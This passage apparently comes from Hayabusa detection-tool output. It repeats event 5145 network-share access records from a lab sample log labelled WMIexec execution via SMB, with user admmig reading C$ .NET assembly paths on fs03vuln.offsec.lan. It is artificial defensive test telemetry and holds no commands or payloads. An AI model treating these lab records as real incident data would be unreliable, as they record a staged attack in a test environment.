Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.001 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.017 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\fab34eeddd8d0d9679cce669b2cff4fe | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V4381984f#\1a33211365967c012f504ade4abce1ed | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.032 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vb0a86591#\f21bca07e5816f88c1107f51e64caa60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Vf4833439#\fb6f372260a08811a4ca7666c60e31e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.VisualC\8dd5d48acfdc4ce750166ebe36623926 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.048 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W0bb5dac4#\eff9f99a173bfe23d56129e79f85e220 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.063 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2bac6884#\98fa0075b3677ec2d6a5e980c8c194e2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d29a719#\b04af69b54fb462c4c632d0f508d617b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.081 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.097 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.097 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.097 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.113 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.128 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.144 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.160 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.191 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:30.207 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 